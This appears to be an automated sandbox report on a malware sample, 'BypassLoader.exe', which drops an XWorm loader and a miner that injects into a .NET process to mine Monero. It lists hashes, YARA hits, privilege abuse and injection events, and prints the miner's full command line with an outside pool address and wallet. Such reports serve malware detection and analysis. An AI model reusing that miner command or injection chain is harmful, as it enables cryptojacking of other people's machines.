Analysis
- max time kernel: 184s
- max time network: 194s
- platform: windows10-1703_x64
- resource: win10-20230915-en
- resource tags: arch:x64, arch:x86, image:win10-20230915-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 13/10/2023, 02:46
Static task: static1
Behavioral task: behavioral1
  Sample: BypassLoader.exe
  Resource: win10-20230915-en
Behavioral task: behavioral2
  Sample: BypassLoader.exe
  Resource: win10v2004-20230915-en
General
- Target: BypassLoader.exe
- Size: 803KB
- MD5: 7a55ed8e73f430327a2c8b189d837cd5
- SHA1: ddbd958dc03cc94b4d7f035edc10826b8959c965
- SHA256: 31045e8b843ce541daf06fd133180f8ff675b3f9b729a11c85c3137fab188256
- SHA512: ee8a6d6d6a284af233559b604d26be71b5079aa4c6619a2733fef8f3d60be3a9f09a617d1ec82094a23e9ba9aed0a81ea3ce25daab3ec49d10e57da0ca3aa316
- SSDEEP: 12288:QBCb1unQrlLM3z7PBWmEUWXS+CO0G03NquQENps9US+F:QIRhLM3QOwS+OG8YzENpf
Malware Config
Signatures
- XMRig Miner payload (12 IoCs)
  resource | yara_rule
  behavioral1/memory/3944-30-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-31-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-32-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-34-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-35-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-36-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-37-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-38-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-39-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-40-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-42-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
  behavioral1/memory/3944-43-0x0000000140000000-0x00000001407CF000-memory.dmp | xmrig
- Executes dropped EXE (2 IoCs)
  pid | Process
  3920 | XWormLoader.exe
  2860 | PureMiner.exe
- Suspicious use of SetThreadContext (1 IoCs)
  description | pid | Process | procid_target
  PID 2860 set thread context of 3944 | 2860 | PureMiner.exe | 76
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoCs)
  pid | pid_target | Process | procid_target
  2428 | 3920 | WerFault.exe | 70
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process
  2860 | PureMiner.exe (the same entry is listed 64 times)
- Suspicious behavior: LoadsDriver (1 IoCs)
  pid | Process
  636 | Process not Found
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2860 | PureMiner.exe
  Token: SeLockMemoryPrivilege | 3944 | AddInProcess.exe
  Token: SeLockMemoryPrivilege | 3944 | AddInProcess.exe
- Suspicious use of FindShellTrayWindow (1 IoCs)
  pid | Process
  3944 | AddInProcess.exe
- Suspicious use of WriteProcessMemory (19 IoCs)
  description | pid | Process | procid_target
  PID 2716 wrote to memory of 3920 | 2716 | BypassLoader.exe | 70 (listed 3 times)
  PID 2716 wrote to memory of 2860 | 2716 | BypassLoader.exe | 72 (listed 2 times)
  PID 2860 wrote to memory of 3944 | 2860 | PureMiner.exe | 76 (listed 14 times)
Processes
- C:\Users\Admin\AppData\Local\Temp\BypassLoader.exe (level 1, PID 2716)
  Command line: "C:\Users\Admin\AppData\Local\Temp\BypassLoader.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe (level 2, PID 3920)
    Command line: "C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"
    - Executes dropped EXE
    - C:\Windows\SysWOW64\WerFault.exe (level 3, PID 2428)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 844
      - Program crash
  - C:\Users\Admin\AppData\Local\Temp\PureMiner.exe (level 2, PID 2860)
    Command line: "C:\Users\Admin\AppData\Local\Temp\PureMiner.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe (level 3, PID 3944)
      Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.225.74.15:8383 -u 48Q5r42DnshBCULPq73bNXLwdJ2jng8QdDq6TZba79TGXL6Z4UNe61A2HUxqnNpUqn1JBZpm1Vv4XNxL28RBQUeR2RwVAGu.RIG_CPU_XMR -p x --algo rx/0 --cpu-max-threads-hint=50
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 628KB
  MD5: aab1dbe96f79d68a24833179fcb0aeed
  SHA1: 3a13dd38b46a94eb40972a07eb3864c4a207d299
  SHA256: 8cef12cc709544a09e84fda051fa24480b093cb33dc8f8306807391d0c3b6091
  SHA512: e6a49984e9871a85c9307a1b4581e09bf0d1fe4cce6968746f17c61bfb8847dd4432b92a4b2588d38e2355ab95f7704a375e11e692984a310d080970f15e0202
- Filesize: 101KB
  MD5: 39d81ca537ceb52632fbb2e975c3ee2f
  SHA1: 0a3814bd3ccea28b144983daab277d72313524e4
  SHA256: 76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
  SHA512: 18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a